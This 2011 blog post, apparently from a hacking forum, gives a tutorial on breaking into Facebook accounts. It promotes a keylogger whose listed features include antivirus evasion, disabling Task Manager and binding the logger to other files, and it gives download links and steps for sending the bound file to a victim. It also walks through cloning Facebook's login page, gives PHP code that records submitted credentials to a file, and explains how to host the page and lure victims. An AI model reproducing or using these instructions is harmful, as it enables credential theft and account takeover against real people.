Chitika

Monday, April 18, 2011

**Exclusive** Mega Thread On H@cking a FaceBook Account


In This Thread I Will Be Covering The Following Methods With Which We Can Hack An FaceBook Account
1) Key loggers
2) Phishing
3) Social Engineering
4) RATs
5) Desktop Phishing

.
.
.
.
KEY LOGGERS::


NooB's Who Dont know What A Key Logger Is Can View Below
Defination ::::::::==>
Keystroke logging (often called keylogging) is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.
In This TUT the keylogger which we r going to use is Project Neptune Version 1.45
*There r many More Keyloggers...........But Here We r Going Use Project Neptune as it is free..!! and it is very stable and it has many awesome features ...





Screenshot below :::

[url]http://img21.imageshack.us/img21/9692/ss111491.png[/url]


Feature Rundown::Quote:


[+] Mouse over features on the builder to view more information about them!
[+] All characters on English Keyboards are logged.
[+] Uses my own custom written Keyboard Hook.
[+] Vital processes are all multithreaded, allowing safe log sending.
[+] Ability to send logs through Email and/or FTP.
[+] Customizable log interval.
[+] Logs are simple and uncluttered.
[+] Customizable log settings.
[+] Ability to disable Task Manager through registry.
[+] Ability to disable Task Manager through process killing.
[+] Ability to disable Task Manager through process list deletion.
[+] Ability to block any number of websites you want.
[+] Ability to delete Internet Explorer history.
[+] Ability to disable:

* [+] Registry
* [+] Run
* [+] Right Clicking
* [+] CMD
* [+] UAC

[+] Customizable mutex string.
[+] Customizable process name.
[+] Edit file's description.
[+] Edit file's copyright.
[+] Edit file's company.
[+] Encrypted settings.
[+] MD5 display of generated server.
[+] Ability to copy another file's creation date to it.
[+] File pumping options in KB and MB. [1.2]
[+] Easily cure yourself once infected. [1.2]
[+] Fake error messages.
[+] Screenshots.
[+] Self destruct on selected date.
[+] Savable app settings - Easily customize and save all your settings for easy organization and future use.
[+] Semi-Custom Server Generation - Neptune uses CodeDOM technology and produces a unique server on every generation.
[+] Auto Update Technology - You no longer have to waste time looking for and downloading updates, they're now all automatic.
[+] Multi File Binding [1.3] -

* [+] Allows unlimited files.
* [+] Each file has a customizable delay.
* [+] Each file has a customizable drop location.
* [+] Displays each file's MD5 for verification.
* [+] Ability to copy each file's MD5.
* [+] All options work with all of the selected files.
* [+] Drag & Drop support for unlimited amounts of files and folders.




Quote:
Notes::

[~] Some settings require the file to be ran as administrator, resulting in crashes if not.
[~] Extract ALL files from the .RAR or else it will not work. [~] Please post all errors you receive!
[~] All files require .NET Framework Version 2.0 SP2, MAKE SURE YOU DO NOT HAVE .NET RTM!
[~] I am not responsible for anything you do with this.






Gif Tag::

[url]http://img17.imageshack.us/img17/1433/20538431.gif[/url]


Multifile Binder::

[url]http://img808.imageshack.us/img808/5275/capturecbm.png[/url]


Server Scan::

Quote:


File Info Report date: 2011-04-08 07:20:02 (GMT 1)
File name: u-exe File size: 29696 bytes
MD5 Hash: c186a3f6c871f5e34cbb8b300a81027c
SHA1 Hash: 634d371a797724f0b3d5f7b326bf4f8c1d3bdf07
Detection rate: 0 on 16 (0%)
Status: CLEAN
Detections
a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -
Scan report generated by NoVirusThanks.org





Video Tutorial::
This video TUT Includes Every Thing About Setting Up This Keylogger
Download HD The video TUT ON Setting Up Project Neptune (( [url]http://jumbofiles.com/oxv590kbya1n[/url] ))



Even After Watching The Video..if u have any problem in setting up the"Project Neptune Version 1.45"....feel free to comment


Project Neptune Version 1.45::

Download it from here ::: {{{{{{ [url]http://jumbofiles.com/z7d5c046bfo6[/url]}}}}}}



**After setting up the keylogger(i.e,,Project Neptune In This TUT)
Bind The Generated file With Any other File Using The Multifile binder Option In The Keylogger...
Note::If u Want u Can Also Crypt it To make it fud....(if u think it not fud)
Send That Binded file To Ur Victim......
Thats It Ur Work Is Done.........and Now Allow The Keylogger To Do Its Work
And Check Ur email Id Which u have used During Setting Up The Keylogger for the logs

Here i will post d remaining 4 tuts and will start explaining it briefly wid every terminology at the End of d tut.So all plz dont comment like didnt get u and all dat.First i will post d tuts and den i will explain 1 by 1

PHISHING :::



Definition::Phishing is the process of stealing sensitive information, such as
usernames, passwords, and bank information, by pretending to be someone
you are not. An example of this would be if you receive and e-mail from a hacker
pretending to be your bank. In this e-mail, it might tell you that you need to
update your account before it expires, and then the hacker provides a . Once
you click on the , you arrive at a website that looks exactly like your actual
bank page. In reality it is just a perfect replica, and when you input your login
details, it sends it to the hackers email or stores it on his web server.



now u will ask how to make an absolute fake page...or where can i get it(simplest way)....so, i have even included "how to make an phishing page"



Making an Absolute Phishing Page::

1)Open "www.facebook.com" ....after loading the page.....right click in the empty space....and then click on view page source (or) simply press "Ctrl+u".......u will get some thing like this

[url]http://i56.tinypic.com/wik7f6.png[/url]


2)Now select all the text in the source page by pressing "Ctrl+A" and copy it.

3)Now open a notepad and paste all the copied text in it and then save it as "something.html"(*while saving make sure that "save as type" is "all files"
4)Now open the "something.html" with a notepad and find a word "action="
u simply can do that by pressing "Ctrl+F" and find "action=".....u will get some thing like this

[url]http://i54.tinypic.com/ics6zt.png[/url]



5)Now replace "https://login.facebook.com/login?login_attempt=1" with "next" and replace"POST" With "GET" it look some thing like this
[url]http://img573.imageshack.us/img573/9569/21585827.png[/url]

6)now save the changes made....and then close the document....
7)open the notepad and copy paste the below php code:

PHP Code:Quote:

<?php
header("Location: https://login.facebook.com/login";
$handle = fopen("password.txt", "a";
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=";
fwrite($handle, $value);
fwrite($handle, "
";
}
fwrite($handle, "
";
fclose($handle);




and then save the document as "next"

Plz note dat in above PHP code the above smiley means ) (Closed bracket) As in frendz4m dat resembles a smily so its howing like dis but dont copy paste d smileys also.Its just a close bracked i.e ).
8)now create another text document with a name "password.txt"
thats it now ur phishing toolkit is ready....

Now what all u have to do is host all the three files which we made (i.e.,,"something.html",,"next",,"password.txt"
for hosting i frequently use "www.110mb.com"





Hosting the files::
1)Create a Free account in 110mb.com {{{{

[url]http://box18.110mb.com/registration/register-a[/url] }}}}

2)Conform Ur account by clicking the conformation in ur email id(which u gave while creating an 110mb account)
3)Login to ur account.......then go to file manager
[url]http://img267.imageshack.us/img267/9139/83198228.png[/url]

4)Click on upload files option and then choose the three files which we made and then click on upload button

[url]http://img843.imageshack.us/img843/7080/56176687.png[/url]

5)thats it hosting the files has been completed....

Next what all u have to do is send that fake page to ur victim(in this case the will be:"www.username.110mb.com/something.html"
Sending The message with phishing page will depend on u...use ur creativity and SE and bla bla.. to impress the victim to click the .......and fall in ur trap

No comments:

Post a Comment